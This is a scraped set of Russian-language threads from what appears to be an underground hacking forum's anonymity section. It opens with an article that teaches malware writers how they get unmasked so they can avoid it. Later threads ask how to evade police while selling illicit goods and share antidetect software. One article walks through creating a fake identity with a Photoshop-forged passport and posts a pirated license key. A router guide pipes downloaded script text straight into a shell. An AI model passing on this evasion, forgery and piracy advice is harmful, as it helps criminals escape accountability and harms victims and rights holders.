Начнем с того, что обе присутствующие на российском рынке отечественные антивирусные компании очень тесно взаимодействуют с правоохранительными органами, чего совершенно не скрывают. Хотя бы по той простой причине, что они вынуждены регулярно получать у суровых организаций с названиями из трех букв лицензии и сертификаты на разработку средств защиты конфиденциальной информации, на работу с криптографией, на защиту персональных данных и далее со всеми остановками. А это означает, что упомянутые компании регулярно проходят проверки со стороны этих организаций и плотно общаются с их представителями.
Кроме того, все они имеют лицензии на проведение технических экспертиз и исследований с использованием методов форензики, причем регулярно используют эти лицензии по назначению — в том числе в интересах государства. Наконец, ходят упорные слухи, что многие работающие на рынке информационной безопасности фирмы в обязательном порядке отправляют куда надо регулярные отчеты о текущей вирусной и киберкриминальной обстановке. Если в такой отчет, помимо сухой статистики, можно включить конкретные сведения о разоблаченном вирмейкере, упустят ли аналитики такую возможность? Ответ, в общем-то, очевиден.

Но есть и хорошая новость, юзернейм. Если однажды утром ты проснулся знаменитым, потому что твое имя внезапно попало в новостные ленты антивирусных компаний, это означает одно из двух. Либо ты уже сидишь в тесном зарешеченном помещении в ожидании суда, либо представители закона не проявили к твоей персоне заслуженного внимания.
Существует такое понятие, как тайна следствия, разглашать которую нельзя ни под каким соусом. Если в отношении некоего абстрактного кодера Васи органы правопорядка проводят какие-либо мероприятия, об этом вряд ли расскажут в интернетах до тех пор, пока кодеру Васе не будет предъявлено обвинение или он не предстанет перед судом. Только вот радоваться, обнаружив себя, любимого, в новостях, тоже глупо: это однозначно свидетельствует о том, что ты уже на карандаше, а о твоем творчестве оперативно сообщили куда следует. И в какой-то не очень прекрасный момент равнодушие со стороны людей в погонах может внезапно смениться пристальным интересом. Обстоятельства, знаешь ли, иногда складываются совершенно причудливым образом.

Это он, это он, ваш тотальный деанон!

Абсолютно во всех известных широкой общественности случаях деанона причину случившегося следует искать в зеркале. Вирмейкеры порой палятся на таких мелочах, которые со стороны выглядят сущей нелепицей. Ну казалось бы, зачем хранить на серваке, где поднята админка ботнета, личные файлы? Зачем сбрасывать стату по работе другого ботнета эсэмэсками на номер мобильного телефона с левой симкой, если этот номер ранее неоднократно светился в объявлениях по продаже компьютерных потрошков с указанием города и даже, ты не поверишь, ближайшей станции метро? Кто надоумил юного гения организовать C&C трояна на публичном хостинге, где крутится сайт папиной фирмы, при этом жестко вбив URL прямо в код?
Складывается впечатление, что подобные глупости совершают исключительно кодеры, которых природа наделила одной-единственной извилиной, да и та анатомически расположена где-то в районе непосредственного контакта организма со стулом. Однако наступить на грабли может буквально каждый. Особенно если он не выработал полезной привычки внимательно смотреть себе под ноги.

В каждой строчке только точки

Как известно, отлаживание — это мучительный процесс избавления программы от лажи. Для облегчения этого самого процесса некоторые компиляторы добавляют в бинарник специальные отладочные строки. В них порой содержится полный путь к папке, где хранились исходники проекта, причем этот путь иногда включает имя пользователя винды, например C:\Users\Vasya Pupkin\Desktop\Super_Virus\ProjectVirus1.vbp.
В процессе реверсинга вся эта радость неизбежно вылезает наружу. Одно дело, если имя учетки придумали те же самые ребята, которые сочиняют непроизносимые названия для товаров в магазине IKEA. Но зачастую строка включает настоящее имя и даже — страшно подумать — фамилию незадачливого вирмейкера. Благодаря этому обстоятельству вычислить его становится намного проще, хотя результат не гарантирован: мало ли на нашей планете обитает однофамильцев? Однако наличие в образце вредоноса отладочной строки с фамилией и характерной структурой папок может стать еще одним доказательством причастности человека к написанию программы, если за него возьмутся всерьез.
Даже если вместо имени пользователя в обнаруженной исследователями строчке значится ник, это все равно даст важную зацепку. Большинство людей, не страдающих паранойей, использует один и тот же ник на различных ресурсах. Это их и подводит. Любой желающий очень быстро отыщет посты интересующего его персонажа на форумах, его страничку на гитхабе и профайл в твиттере. Понять, что все эти «цифровые следы» оставило одно и то же лицо, несложно: одинаковый аватар, схожая подпись, один и тот же текст, размещенный на разных площадках… Дальше потянется ниточка, которая куда-нибудь да приведет.

Вот тебе мыло душистое и полотенце пушистое

Еще одно распространенное природное явление — хранение адресов электронной почты в виде незашифрованных символьных значений. Характерные строки — это первое, на что обращает внимание в дизассемблированном коде реверс-инженер. Притом некоторые индивидуумы полагают, будто достаточно поксорить строчку, чтобы надежно спрятать свой адрес на мейл.ру от посторонних глаз. Нет, друзья, недостаточно.
Если в коде внезапно обнаруживается мыло, оно тут же вбивается в гуголь. Дальше возможны варианты. По адресу электропочты через несколько последовательных шагов может отыскаться и учетка в телеграме, и страничка пользователя в социальных сетях, и факт его регистрации на форумах вместе со всеми сообщениями. А может не нагуглиться ничего. Второй вариант случается, если предусмотрительный юзернейм не использует один и тот же ящик для технических целей и личной переписки.

Не стучите, открыто!

Еще веселее, когда какой-нибудь непризнанный гений прописывает прямо в коде логин и пароль, например от админки бота или от облачного хранилища, куда трой заливает утянутые с компьютера пользователя файлы. Совсем хорошо, если один и тот же пароль используется везде, где только можно — и для авторизации в админке, и на почтовом сервере, и в социальных сетях.

В этой связи невольно вспоминается один недавний случай, когда некий анонимус решил проверить трояна-стилера на собственном компьютере. Стилер, что характерно, отработал на пять баллов. В результате в облако, логин и пароль от которого хранились в открытом виде в самом трое, с компа нашего естествоиспытателя было выгружено все исподнее, наглядно продемонстрировав исследователям его неприкрытую ж~~о~~ изнь и богатый внутренний мир.

Ваш домен выключен или находится вне зоны обслуживания

Кое-кто очень любит забивать прямо в код адреса управляющих серверов, даже несмотря на то, что прогрессивное человечество давным-давно придумало DGA — алгоритмы динамической генерации доменных имен. Примеры таких решений можно без особого труда найти в этих ваших интернетах.
И дело не в том, что DGA повышает живучесть троя (накрылся один управляющий сервак — софтина автоматически подключается к следующему), и даже не в том, что сервер, если его адрес известен, можно сбрутить, засинкхолить или заDDoSить. Вычислить можно и сгенерированный адрес, вдумчиво покурив алгоритм, но тут вступают в действия иные механизмы защиты — верификация подписи сервера, шифрование при передаче данных и прочие.

Даже если сломать админку у исследователя не получилось, очень много полезной информации можно добыть, воспользовавшись службой whois. И скрытие имени держателя домена помогает далеко не всегда. А еще можно поискать другие сайты на том же IP-адресе, посмотреть, что на них находится, и попробовать зайти оттуда. В принципе, многие слышали термин CloudFlare, но вот разбираться, что это такое, всем обычно лень.
Некоторые гуманоиды и вовсе поднимают админки у публичных хостеров либо на площадках, где крутятся другие их проекты или сайты работодателя. Комментировать такое я, пожалуй, не стану: глумиться над подобным грешно, а плакать уже сил нет.

И смех и грех

Гордыня — это смертный грех. А грешников, как утверждают религиозные деятели, ждет неминуемое наказание. Далеко не все вирмейкеры готовы оставаться в тени и тихонечко стричь бабло, им хочется славы, почета и уважения, внимания публики и бурных оваций. В результате кое-кто начинает записывать видосы о компиляции и обфускации троев и выкладывать скринкасты на ютубе. Позабыв при этом закрыть в браузере вкладочки со своей страничкой «Вконтакте» и окошки проводника, где на HD-разрешении можно разглядеть очень много интересного.

Другой персонаж компрометирующих роликов не снимал, зато выкладывал в интернет крайне интересные статьи о методах обхода UAC, написании сплоитов, повышении привилегий в системе и прочих вирмейкерских трюках. С конкретными примерами, конечно. Вычислили его очень просто: по этому самому коду, вернее по характерным именам переменных, комментам, манере реализации некоторых функций — в общем, сравнив выложенные в паблик исходники и кодес из IDA Pro. Отпираться оказалось бессмысленно — код он размещал в личном блоге за собственной подписью. Фаталити.

Вместо послесловия
Методов идентификации авторов малвари существует великое множество, я упомянул только о самых очевидных из них. Выводы тоже вполне очевидны: в кабинет к следователю вирмейкеров приводит собственная некомпетентность и ~~расп~~ наплевательское отношение к элементарным вопросам безопасности. Впрочем, это, возможно, и неплохо: помнится, один похожий на Льва Толстого дядька что-то писал про естественный отбор. Который, по его мнению, в целом способствует повышению выживаемости вида.

P.S. Копипаст с другого ресурса!

Анонимность в крипте. Кажется ее не существует.

ID: 676533bbb4103b69df371b1a
Thread ID: 65367
Created: 2022-04-08T09:38:42+0000
Last Post: 2022-04-30T08:54:35+0000
Author: Volt Ghost
Replies: 52 Views: 3K

Хотелось бы раз и на всегда разобраться в вопросе анонимности при использовании криптовалют!
Пишу свои мысли, которые не являются абсолютом, не ругайтесь.
Очень хочу услышать советы либо конструктивную критику.

Если очень кратко о рисках:
Транзакции btc можно отследить
Xmr не исключение (еще в 2018 доказали)
Миксеры усложняют отслеживание, но не обрубают хвостов

Какой последовательности в действиях нужно придерживаться, чтобы достичь максимальной анонимности (так как абсолютной достичь похоже не реально) ?

Надеюсь люди обладающие нужными знаниями напишут тут пару строк.

VPN: Свой или чужой?

ID: 676533bbb4103b69df371b3c
Thread ID: 61736
Created: 2022-01-20T19:06:21+0000
Last Post: 2022-02-24T06:08:39+0000
Author: porfavore
Replies: 53 Views: 3K

Если занимаешься тёмными делами, есть смысл поднимать свой vpn на арендованном сервере или же сойдёт купленный (по типу nord, exspress и т. д.) ?

Как бороться с fingerprint'ами браузера/железа?

ID: 676533bbb4103b69df371b68
Thread ID: 49013
Created: 2021-03-06T11:22:56+0000
Last Post: 2021-12-30T14:05:50+0000
Author: 0x2d4_a8
Replies: 22 Views: 3K

Здравствуйте.
Не кардер, мне не нужен полный анти детект, который могут предоставить браузеры-антидетект по типу Linken Sphere или Multilogin, но сейчас думаю о том, что все сайты которые я посещаю, будь то онлайн-кошелек, форум или поисковик, могут записывать фингрпринты браузера и железа и отслеживать меня, а так же отслеживать все аккаунты с которых я логинился, даже если это было с разных IP.
Есть ли способы предотвратить фингерпринты браузера и железа в обычном Firefox/Tor Browser? Может быть, есть какие нибудь расширения для этого?

Анонимность и безопасность ч2 – Роутер(шлюз)

ID: 676533bbb4103b69df371b90
Thread ID: 32471
Created: 2019-10-13T15:53:27+0000
Last Post: 2021-10-19T04:12:29+0000
Author: Benihowy
Replies: 10 Views: 3K

Анонимность и безопасность ч2 – Роутер (шлюз)

Доброго времени суток. В этой части рассмотрим очень уязвимую виртуальную машину, которая соединяет домашнюю сеть с глобальной. Правильная настройка ее крайне важна. Для начала создадим виртуальную машину второго поколения. В моем случае я выделил 1Гб ОЗУ в динамическом режиме (если % потребления ОЗУ виртуальной машины уменьшается, то гипервизор уменьшает размер памяти на данную ВМ), 1 ядро процессора, 2 сетевых адаптера. Теперь нужно определится с операционной системой внутри ВМ. Я сторонник Микрософта, изучаю ОС серверные и десктопные, поэтому и буду устанавливать windows. И уверен, что windows, будет лучше оптимизирована под гипервизор hyper-v, ведь оба эти производители – Микрософт.

Я выбрал windows 8 одну из первых редакций, ссылки приводить не стану, может это будет расценено неожиданным для меня образом. Скачать можно с торрент трекеров. Итак, почему именно эта система? Я подбирал систему основываясь на потреблении памяти и функционале. Перепробовав все системы windows’a я остановился именно на ней. Скажите, что она старая и более уязвимая нежели недавно вышедшая 10ка 1909, или необходимо устанавливать только серверную ос? Это не так, ведь, эта система нужна только для маршрутизации трафика. Она не будет иметь открытые порты, к ней не будут подключатся удаленно и тд.

С системой разобрались, теперь преступим к настройке. В первую очередь нужно отключить не нужные службы – защитник, брандмауэр, также автоматическое обслуживание (Win + R => taskschd.msc; Microsoft=>Windows=>TaskScheduler=>Regular Maintance=>Отключить), защиту системы(свойства системы),в настройках электропитания отключить спящие и ждущие режимы.
Далее создаем нового пользователя (с паролем, пароль у административной учетки тоже должен быть). Оставляем его с обычными правами.
Теперь перейдем к настройкам сетевых интерфейсов. В свойствах нужно оставить только tcp\ip4.

Самое важное – это файервол. Из всех вендоров я остановился на Agnitum outpost firewall. Он имеет довольно тонкую настройку. Из соображений безопасности нужно разрешить трафик только определенным приложениям, а все остальное заблокировать. Следует знать, трафик могут генерировать как приложения, так и сама система. Трафик, созданный самой системой, называется низкоуровневым, так как, нету конкретного приложения что его генерирует.

Их нужно заблокировать, для этого есть целый ряд правил.

Я выбрал все протоколы в графе тип IP-протокола. В удаленном и локальном адресах указал весь интернет. На скрине правила для исходящего трафика, такие же нужно сделать и для входящего.

И еще два правила, которые вписал для самоуспокоения.

Теперь установим необходимые программы для маршрутизации трафика. Нам понадобится прокси сервер. Я выбираю ccproxy. Нам нужно поднять прокси сервер на адаптере, который смотрит во внутрь домашней сети.

Для этого приложения нужно определенные правила. Доступ к прокси серверу нужно разрешить с определенных ip.

Правила для исходящего трафика также нужно написать. Есть два варианта развития:
- Если вы в последующей цепочки используете впн, следует разрешить только айпи адрес впн сервера.
- Если тор, нужно разрешить всем айпи адресам с портов 9001. Но тут на ваше усмотрение.

Также стоит настроить проактивную защиту, которая контролирует любую активность других программ. С этой настройкой следует быть осторожней, если ползунок выкрутить на максимум, то система загрузится, но рабочий стол не появится, будет блокирован winlogon.

Есть выход. Нужно для начала выкрутить ползунок на максимум и выставить автоматическое создание и обновление правил. Некоторое время нужно потратить на правила. После правила вернуть в «ручной режим»

Не стоит забывать про UAC.

В следующей статье поговорим про следующие цепья в звене - роутерах.

Легко ли меня найти, когда я использую просто тор для анонимности?

ID: 676533bbb4103b69df371bb6
Thread ID: 54728
Created: 2021-08-02T20:02:53+0000
Last Post: 2021-08-25T21:30:25+0000
Author: qwerty0984
Replies: 41 Views: 3K

Всем привет. Я ничего такого не знаю про анонимность, прочитал много тем на этом форуме, но до сих кое-что не понимаю. Сейчас я сижу чисто через Tor браузер, глянул на одном сайте про анонимность и там было написано, что я скрыт на 40% процентов. Извиняюсь за глупый вопрос, но "легко ли меня могут вычислить?" Неважно кто, хакеры, полиция, мой провайдер. Можете подсказать, что мне ещё использовать, да бы особо не оставлять следы в интернете? Посмотрел цены на прокси, а в этом я сильно не шарю и покупать пока не буду?

Софты Vektor Т13 Те что идут с премиум сборкой за август + драйвера

ID: 676533bbb4103b69df371bbb
Thread ID: 55689
Created: 2021-08-22T12:09:02+0000
Last Post: 2021-08-23T22:30:21+0000
Author: Tubu
Prefix: Статья
Replies: 11 Views: 3K

https://cloud.mail.ru/public/fuoi/yXeUZncVx

https://www.virustotal.com/gui/file...f044ac27f870d00f523b125df1867ad79a7/detection

Собственно архив с софтами которые используются вместе с антидетектом Вектора Т13 самые новые.

Плюс драйвера на Intel , ATI, Nvidia.

В архиве есть:

1. Antidetect_DX

2. AntiOS_3.5.5

3. AntiRTC_1.1.0

4. Ninite(beware of schemeflood)

5. Times

6. YogaDNSSetup

Анонимность/Где ее Найти?

ID: 676533bbb4103b69df371ceb
Thread ID: 32975
Created: 2019-11-04T11:39:18+0000
Last Post: 2020-04-13T12:46:06+0000
Author: Pr0_ogrammer
Prefix: Статья
Replies: 10 Views: 3K

Введение

День добрый, дорогие друзья. Наверно каждый из нас в своей жизни сталкивался с такой ситуацией, когда нужно скрыть все свои данные от лишних глаз и быть полностью анонимным. Но как многие знают Анонимности Нет! Сказано конечно сильно, но не всегда применимо. В этой статье я бы хотел подробно рассказать, как обезопасить себя от Деанона и выдавать по минимум информации в интернете. Но начнем с предыстории.

Началось все наверно 10-15 лет назад. В то время во мне гуляла жажда что-то взломать, чтобы удостовериться в своих знаниях. Придерживался я такой позиции, что кому я нужен и за это ничего не будет. Глупо правда? Но было это до поры, до времени. Нет, меня не поймали и не ставили на учет, а просто сделали пару предупредительных выстрелов. И в этот момент я понял, что все же нужно как-то защищаться. Кто не знает сейчас я есть почти везде. Но мой энтузиазм не утихал и продолжал убеждаться в своих навыках. Это мог быть простой взлом Wi-Fi соседа, но тянувшийся потом к утечке всех его данных. Хотя на самом деле такого не было и везде куда я проникал оставлял все на своих местах и не трогал ничего.

На данный момент я полностью защищен от деанонимизации и решил поделиться таким опытом с вами. Точнее рассказать, как добиться такого же эффекта. Приступим.

Этап 1 | Каркас другого Человека

И так, давайте начнем с того, что нам нужно. Будем использовать сайты, которые помогут нам в этом. Первое переходим сюда. Покажу на примере моей генерации:

Можете взять этот пример. Теперь, чтобы регистрироваться не под данными именами, можно воспользоваться генератором nick-name 'ов. Идем сюда, ставим нужные вам настройки и генерируете.

Ну или придумайте свое. Для тех, кому данные имена не подошли воспользуемся Google. Но прежде назовите свою любимую страну? Зачем? Просто вводите имена определенной страны. К примеру Бразильские имена. По такому запросу открываем Википедию и ищем подходящее вам решение. С фамилиями так же. Но способ описанный выше будет эффективнее. Идем дальше и ползем на сайт. Тут просто берете логин вашего человека и меняете его на данной почте.

Основы готовы, но использовать портрет на сайте генератора личностей я не рекомендую. Поэтому, чтобы у нас был настоящее лицо нашего персонажа пользуемся данным сайтом.

Здесь нам генерируют портреты с помощью нейросети. Теперь дело за малым, а именно приобретение и использование номеров телефонов, для совершение звонков и регистраций на сайтах. Для такого случая я всегда рекомендую использовать данный, дешевый по ценам на номера сервис.

Номера здесь не превышают цены выше 50 рублей. Поэтому можете спокойно заливать туда деньги. Теперь нам чтобы завершить нашу личность создать для нее паспорт. Для тех, кто еще не понял к чему это все объясню, что мы создаем данную вещь, чтобы заходить в Интернет под таким человеком. По сути нас будут знать так, но на самом деле мы другой человек. Так же советую обдумать биографию и манеру общения так как она должна отличаться от вашей. Самый простой способ сделать паспорт это через Photoshop. Все, что нужно грузим отсюда.

Но для тех, кто не хочет мучится с изменениями, то скачиваем данную программу и спокойно работаем в ней. Все, теперь наш подельник полностью готов к работе. Теперь переходим к следующему этапу. А именно выходу в интернет ведь там тоже просто нельзя заходить со своего ПК.

Этап 2 | Защита от Пробива

На данном этапе нам нужно обеспечить себя от пробива по MAC/IP адресам. Для скрытия ip адреса воспользуемся программой SafeIP. Скачиваем ее по ссылке, запускаем и делаем все, что вам нужно.

Функционал у данной программы достаточно большой, но желательно иметь ключ активации для данной программы. Его я предоставил ниже:

17108-85131-85564-95332-68376

И так, скрыть IP адрес нам удалось, но теперь нужно спрятать MAC адрес. Я работал на Windows 10 и поэтому показывать буду именно на нем.

1. Идем в Диспетчер Устройств нажав Win+X.
2. Ищем Сетевые Адаптеры и берем нужный вам.

3. Правой кнопкой мыши кликаем по нему и выбираем Свойства.

4. Видим примерно такую картину.

5. Переходим в раздел Дополнительно и ищем Network Address.

6. Теперь вводим в поле нужный вам адрес без каких-либо черточек и тире. После жмем ОК и закрываем окна.

И так, данный метод защитит нас от внешних воздействий. Но я лично рекомендую купить дедик (удаленная машина) для работы, чтобы быть в безопасности. Но тут решать вам, я лишь даю информацию. Теперь нам нужно защитить все данные, которые хранятся на нашей машине.

Этап 3 | Шифруем Данные

Прежде чем начать, я бы хотел сказать какой браузер использовать для выхода в интернет. Рекомендую использовать:

1. FireFox
2. Comod Dragon

Это два самых нормальных браузера для обеспечения безопасности и анонимности. Почему не Tor Browser наверно объяснять не стоит так как при первом же входе на стандартный аккаунт в социальной сети через него вас спалят, а дальше думаю исход событий понятен.

Теперь давайте зашифруем наши данные с помощью программы VeraCrypt. Скачиваем здесь. После загрузки устанавливаем и запускаем.

Здесь у нас стартовая страница для работы с программой. Для начала разберемся, что к чему. У данной программы имеется свойство создания томов. Они разделяются на 2 типа:

Обычный том защищает ваши файлы паролем. Этот пароль нужно вводить всякий раз при начале работы с зашифрованным томом VeraCrypt.

Cкрытый том имеет два пароля. Ты можешь использовать один из них, чтобы открыть маскирующий обычный том, где хранятся не столь важные данные. Этой информацией не страшно рискнуть при крайней необходимости. Второй пароль дает доступ к скрытому тому, где хранится самое важное.

Теперь давайте приступим к работе.

1. Создаем Новый Том [Создать Том]

2. Выбираем 1 вариант [Далее >]

3. Нужен Обычный Том и кликаем на него

4. Берем расположения нашего тома [Файл...] => [Далее >]

5. Здесь ничего не меняем и пропускаем это окно

6. Размер Тома берете на ваш вкус и идем дальше [Далее >]

7. Вот это завершающий штрих и он довольно странный. Здесь вы в пределах данного окна должны перемещать мышку до тех пор пока линия не станет зеленой и после завершаете создание [Разметить]

Все, отлично, наш том создан и в нем теперь вы спокойно можете хранить свою информацию. Но скажу сразу, что обнаружить следы нашей программы вполне возможно, но открыть закрытые контейнеры - нет. Поэтому пользуйтесь.

Советы | Рекомендации

1. Для безопасного общения и передачи информации хотел бы поделиться с вами таким сервисом firetalks. Там есть анонимное и безопасное общение. Предоставьте только своему собеседнику ключ для подключения к беседе.

2. Безопасный пароль - главное в защите информации. Для анализа своего пароля рекомендую использовать сервис How Secure Is My Password. Здесь вы сможете проверить надежность своего пароля или убедиться в ней.

3. Очистка старых следов. Данный сервис помогает найти и удалить свои старые аккаунты. Этим вы обезопасите себя от старых деяний и вас будет тяжелее найти.

4. Используйте антивирусы и проверяйте все загружаемые программы и файлы, чтобы избежать нежелательных гостей. Рекомендую делать это даже на виртуальной или удаленной машине. Один из таких сервисов pdf2go, который позволяет проверить pdf файл. Это очень эффективно и дает дополнительную информацию о файле.

Вывод | Итог

И так, что в этой статье мы разобрали? Первое это создание левой личности, чтобы обеспечить первоначальную безопасность и анонимность. Второе это защита от деанона и замена реального ip и mac адреса. Вещь очень полезная ведь чаще всего именно по ним находят людей. Третье это шифрование данных, чтобы при вторжение на ваше устройство сложно было что-либо разузнать.

В итоге хочу сказать вам, что анонимность прежде всего там, где безопасность. И будет достаточно тяжело найти человека, который хорошо защищает свои данные в сети. В основном это все, что я хотел вам рассказать. Статья лично моя и нигде такой нет. А дальше удачи и будьте бдительны

Как удалиться со всех социальных сетей?

ID: 676533bbb4103b69df371bbc
Thread ID: 55421
Created: 2021-08-17T09:27:55+0000
Last Post: 2021-08-23T14:51:54+0000
Author: SUSPENSE
Prefix: Статья
Replies: 6 Views: 3K

UX-дизайн соцсетей и популярных сервисов специально устроен так, чтобы вы не удаляли аккаунт. Поэтому кнопка удаления глубоко спрятана в интерфейсе — её тяжело найти. Но если у вас экстренная ситуация или просто лень искать — есть лайфхак, как это обойти.

Пользуйтесь сервисом — JustDelete. Там есть либо прямые ссылки на удаление аккаунта, либо понятная инструкция, как это быстрее всего сделать. В выдаче — все соцсети, мессенджеры, популярные сервисы и ПО. От Facebook , WhatsApp и ВКонтакте — до Bitly и ChangeOrg. Но есть нюанс: не все аккаунты можно удалить с помощью пары кликов. Для этого в JustDelete рядом с названием каждого сервиса есть плашка.

Если «Easy» — аккаунт легко удалить. «Medium» — нужны дополнительные действия/часть информации о вас останется на серверах. «Hard» — свяжитесь с техподдержкой для удаления. И статус «Impossible» — невозможно удалить аккаунт. Очень полезный сервис, пользуйтесь!

Настройка роутера для обхода блокировок с помощью Tor

ID: 676533bbb4103b69df371bc2
Thread ID: 55080
Created: 2021-08-09T20:11:37+0000
Last Post: 2021-08-12T16:58:59+0000
Author: Arg0s
Prefix: Статья
Replies: 3 Views: 3K

В данной статье, я хотел бы максимально просто и доступно описать процесс настройки вашего роутера для обхода блокировок и анонимной работы в интернете.
К плюсам данного метода можно отнести то, что он не требует никаких настроек в операционной системе вашего компьютера, чтобы весь ваш интернет трафик проходил через сеть тор.
Для реализации данного метода вам понадобится любой роутер, работающий под управлением OpenWrt(Важно, чтобы на роутере хватало памяти для установки необходимых пакетов).
OpenWrt — встраиваемая операционная система, основанная на ядре Linux, предназначенная, в первую очередь, для домашних маршрутизаторов.
Процесс установки OpenWrt на конкретный роутер вы можете найти на различных специализироваанных форумах, в данной статье я не могу описать процесс установки, т.к. он может отличаться на разных типах роутеров.
После того, как вы установили OpenWrt на свой роутер, вам необходимо подключить его к интернету (лично я использую роутер на OpenWrt, в качестве моста).
После подлючения роутера к интернету, вам необходимо подключиться к нему по SSH с вашего компьютера.

Подключение по SSH:
На ОС Windows:
Подкючить по SSH на Windows, можно с помощью программы PuTTY
Скачиваем её, и в окне программы вводим IP-адрес и ssh-логин(root по стандарту) вашего роутера.

На UNIX-подобных системах
На таких системах как: Linux, macOS и BSD системах всё намного проще
Для подключения по SSH необходимо ввести в терминале команду
ssh ssh_логин@ip-адрес_роутера
Для примера:
ssh root@192.168.1.1

После ввода команды, система попросит вас ввести пароль, который вы указали при входе в web-панель роутера
Если всё было введено верно, вы увидете в своём терминале нечто подобное:

Теперь приступим к установке Tor
Т.к. данная статья написана с целью максимально быстрой настройки, использовать будем скрипт для автоматической установки и настройки Tor.
В терминале последовательно вводим эти команды(для упрощения понимания выделю отдельные команды разным цветом):
opkg update
opkg install libustream-mbedtls
URL="https://openwrt.org/_export/code/docs/guide-user/services/tor"
cat << EOF > tor-client.sh
$(uclient-fetch -O - "${URL}/client?codeblock=0")
$(uclient-fetch -O - "${URL}/client?codeblock=1")
$(uclient-fetch -O - "${URL}/client?codeblock=2")
$(uclient-fetch -O - "${URL}/client?codeblock=3")
$(uclient-fetch -O - "${URL}/client?codeblock=4")
EOF
sh tor-client.sh
После выполнения этих команд, перезагрузите роутер, теперь ваш роутер перенаправляет весь трафик в сеть тор
Проверить логи тор можно помощью данной команды:
logread -e Tor
На этом настройка роутера завершена.
Таким образом вы получаете отличное аппаратное решение для анонимизации вашего трафика и обхода блокировок, помните, что тор это не панацея от всех видов деанонимизации, если вы хотите заниматься чем-либо незаконным, используя данный метод, то вам стоит так же установить и настроить obfs4proxy на ваш роутер.
Для того, чтобы зайти на сайты, блокирующие тор-соединения, вам стоит настроить в вашем браузере подключение к SOCKS5 прокси
Все эти действия были произведены на роутере ASUS RT-N14U на прошивке OpenWrt 19.07
Если у вас остались какие-либо вопросы, задавайте, постараюсь каждому помочь и ответить!
Всем удачи в настройке ваших систем.

Восстановление данных

ID: 676533bbb4103b69df371bc3
Thread ID: 50417
Created: 2021-04-07T18:28:33+0000
Last Post: 2021-08-06T12:47:37+0000
Author: Benihowy
Prefix: Статья
Replies: 10 Views: 3K

В современном мире слабым звеном все же является носитель информации. Он может выйти из строя по вине производителя, но чаще, по вине пользователя. Наверное, самое распространённое явление – физическое воздействие, другими словами удар. Случайный или намеренный удар может «убить» жесткий диск, если тот в момент удара работал. Хорошо если есть резервная копия информации. Что же, рассмотрим порядок восстановления информации с носителя, если он определяется компьютером (программное восстановление). Например, воспользуемся программой r-studio.

- Рассмотрим простое восстановление случайно удаленного файла important file на рабочем столе

Удалим его через shift+del и попробуем восстановить. Откроем программу и запустим сканирование на диске С

Подождем окончания сканирования. В зависимости от информации, могут различаться элементы разделов по цветам. Это особо не на что не влияет. Искать информацию стоит в зеленых и оранжевых элементах

Чем больше времени прошло с момента удаления, тем меньше вероятность восстановить этот файл, ведь он может быть перезаписан как пользователем, так и самой системой. Так как диск не поврежден, и не был полностью перезаписан, то можно восстановить структуру файлов и папок, и на рабочем столе найти наш файл

Очень важно стоит выбирать место, куда будет восстановлена информация. Категорически запрещается сохранять информацию на этот же носитель, с которого и происходит восстановление.

- Немного усложним задачу. К примеру, имеется рейд 5 из трех дисков

Скопируем на него аудиофайл и отключим два диска. R-studio автоматически распознает в единственном диске, то что он является частью рейд массива

Можно даже зайти на него и просмотреть структуру файлов (при условии, если диск исправен и не форматировался)

Восстановить аудиофайл разумеется удастся, вот только проиграть не получится, так как в восстановленном файле будет только часть исходного файла. При подключении любого из двух оставшихся дисков, появится возможность полностью восстановить файл.

- Что делать если диск был отформатирован и перезаписан? В качестве эксперимента создадим раздел небольшого объема (vhd), сохраним на нем музыку, удалим и заполним фотографиями (на половину)

Получается, если файл полностью перезаписан, то информацию достать такими методами не удастся? Да, это так, vhd файлы, как и реальные диски имеют такое свойство. Файл на реальном носителе информации представляет из себя не всегда последовательность секторов, но и хаотичность. Поэтому, восстановить из реального жесткого диска куда вероятней чем с виртуального. Но стоит подумать о том, что виртуальные файлы хранятся на реальных накопителях информации, и сканируя их, мы получим желаемый результат. Более того в процессе сканирования r-studio способна определить все виртуальные диски и показывать каждый диск как отдельный элемент. Это намного облегчает задачу с поиском информации на виртуальных дисках

- Если диск настолько поврежден, что не читается и форматирование выдает ошибки. Для таких дисков нужно воспользоваться утилитой R-Studio Emergency, которую записываем на флешку и запускаем через бут меню. В первую очередь нужно создать образ поврежденного диска и уже с него пытаться восстанавливать.

- Если компьютер находится удаленно, можно воспользоваться сетевым восстановлением. На удаленном компьютере устанавливаем r-studio agent, подключаемся к нему. Восстановление данных с удаленного компьютера происходит таким же образом, как и на локальном компьютере.

Выводы. Восстановить данные легко на 100%, если они не перезаписывались и носитель информации цел. В противоположных случаях имеет место частичное восстановление файла(ов). Также не стоит записывать восстанавливаемые данные на носитель, с которого и происходит восстановление. Даже если речь идет о другом разделе, диск может еще больше «деградировать» в процессе записи, и затронуть раздел, с которого происходит восстановление. Если вы не знаете о состоянии диска, нужно первым делом снять образ.

Как продавать через Telegram, что бы не поймали?

ID: 676533bbb4103b69df371bc8
Thread ID: 54642
Created: 2021-07-31T13:56:20+0000
Last Post: 2021-08-03T12:40:32+0000
Author: koruko
Replies: 60 Views: 3K

Как продавать "ЧТО-ТО" через телегу, что бы не поймали? Помогает ли левая симка и телефон? Помогает ли обезопасить себя платный впн? Допустим я возьму левую симку и воткну в телефон, как меня могут поймать?

Какой отпечаток о себе я оставляю роутеру, когда подключаюсь к нему ?

ID: 676533bbb4103b69df371be5
Thread ID: 50594
Created: 2021-04-13T01:28:08+0000
Last Post: 2021-06-12T16:58:50+0000
Author: dontknowend
Replies: 22 Views: 3K

Что это ? Уникальные данные устройства, мое местоположение, MAC?
Как можно анонимно подключится к роутеру ?
Заранее благодарю за ответ! )))

ПроксиРоутер. Серьезно :)

ID: 676533bbb4103b69df371be7
Thread ID: 51555
Created: 2021-05-09T02:42:09+0000
Last Post: 2021-06-12T16:47:55+0000
Author: x4k
Prefix: Статья
Replies: 7 Views: 3K

Не спится что-то. Ковырясь в ~~машинах пользователей~~ своих скриптах, нашел свой самый первый секс с ОС Linux и решил облегчить жизнь простым пользователям и кошельки различным КулХацкерам, которые продают подобные штуки (не скрою, было продано, не мной, несколько экземпляров этого устройства). Немного поправил скрипт установки, но в основном, и опытные пользователи наверняка это заметят, все оставил как и было. Благо все работает идеально. Расшарил ветку на гитлабе для общего доступа. Написал по-быстрому README.MD и выкладываю текст и пару фоток, которых нет на гите на Ваше обозрение, и, возможно, использование ;-) Итак, поехали:

Proxy Router

WTF

